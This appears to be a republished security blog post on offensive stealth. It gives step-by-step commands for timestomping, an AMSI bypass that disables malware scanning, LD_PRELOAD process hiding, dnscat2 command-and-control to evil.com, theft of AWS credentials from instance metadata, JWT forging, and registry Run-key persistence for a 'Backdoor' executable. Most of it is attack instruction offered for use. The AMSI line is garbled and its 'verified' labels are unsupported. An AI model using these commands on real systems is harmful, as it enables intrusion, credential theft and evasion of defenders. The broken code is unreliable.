Listen to this Post
Introduction:
Stealth is a critical component of offensive security, enabling penetration testers and red teams to operate undetected in target environments. Advanced evasion techniques, coupled with the right tools and configurations, can make the difference between a successful engagement and early detection. This article explores key stealth methodologies, verified commands, and best practices for maintaining persistence while avoiding defensive mechanisms.
Learning Objectives:
- Understand key stealth techniques used in offensive security.
- Learn verified Linux/Windows commands for evasion and persistence.
- Explore advanced tool configurations to bypass detection.
1. Evading Logging with Timestomping
Verified Command (Windows – PowerShell):
(Get-Item "C:\target\file.exe").CreationTime = "01/01/2020 00:00:00"
Step-by-Step Guide:
Timestomping modifies file timestamps to blend malicious files with legitimate ones, evading forensic analysis.
1. Open PowerShell as Administrator.
2. Use `Get-Item` to locate the target file.
- Adjust
CreationTime,LastAccessTime, or `LastWriteTime` to match surrounding files.
2. Disabling Windows Defender with AMSI Bypass
Verified Command (PowerShell):
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Step-by-Step Guide:
The Anti-Malware Scan Interface (AMSI) scans PowerShell scripts for malicious content. This bypass disables it temporarily.
1. Execute the command in a PowerShell session.
- Test with a flagged script to confirm AMSI is disabled.
- Warning: This is detectable by advanced EDR solutions.
3. Linux Process Hiding with LD_PRELOAD
Verified Command (Linux):
gcc -shared -fPIC -o libprocesshider.so processhider.c && export LD_PRELOAD=/path/to/libprocesshider.so
Step-by-Step Guide:
This technique hides a process from ps, top, and similar tools.
1. Write a C program (processhider.c) that hooks process listing functions.
2. Compile it into a shared library (`libprocesshider.so`).
- Use `LD_PRELOAD` to load it before executing hidden processes.
4. DNS Tunneling for C2 Evasion
Verified Command (dnscat2 – Attacker Setup):
sudo ruby dnscat2.rb --dns domain=evil.com --secret=MySecretKey
Step-by-Step Guide:
DNS tunneling bypasses network filters by encapsulating data in DNS queries.
1. Set up a domain (evil.com) with NS records pointing to your server.
2. Run dnscat2 on the attacker machine.
- Execute the client on the target to establish a covert channel.
5. Cloud Instance Metadata Exploitation (AWS/Azure)
Verified Command (AWS IMDSv1):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step-by-Step Guide:
Cloud metadata services can leak sensitive credentials if misconfigured.
1. If IMDSv1 is enabled, query the metadata endpoint from a compromised instance.
2. Extract temporary AWS keys for privilege escalation.
3. Mitigation: Enforce IMDSv2 and restrict metadata access.
6. API Security: JWT Token Manipulation
Verified Command (Python – PyJWT):
import jwt
token = jwt.encode({"user":"admin"}, "secret", algorithm="HS256")
Step-by-Step Guide:
Attackers forge JWTs to escalate privileges in web apps.
1. Capture a JWT from a web request.
- Use tools like `jwt_tool` or PyJWT to modify claims.
- Re-sign with weak keys or “none” algorithm if allowed.
7. Windows Persistence via Registry
Verified Command (cmd):
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\malware.exe"
Step-by-Step Guide:
This adds a malicious executable to startup.
1. Open Command Prompt as Administrator.
- Use `reg add` to create a new autorun entry.
- Ensure the payload (
malware.exe) is placed in a persistent location.
What Undercode Say:
- Key Takeaway 1: Stealth requires a deep understanding of system internals and defensive mechanisms.
- Key Takeaway 2: Combining multiple evasion techniques (e.g., timestomping + AMSI bypass) increases success rates.
Analysis:
Modern detection systems (EDR/XDR) are evolving, making stealth more challenging. However, low-level techniques (e.g., direct syscalls, memory-only payloads) remain effective. Future offensive security will likely focus on AI-driven evasion and adversarial machine learning to bypass next-gen defenses.
Prediction:
As enterprises adopt AI-powered security tools, red teams will increasingly leverage AI to automate evasion, creating an arms race between attackers and defenders. Organizations must prioritize threat hunting and anomaly detection to counter advanced stealth tactics.
IT/Security Reporter URL:
Reported By: Daniel Scheidt – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
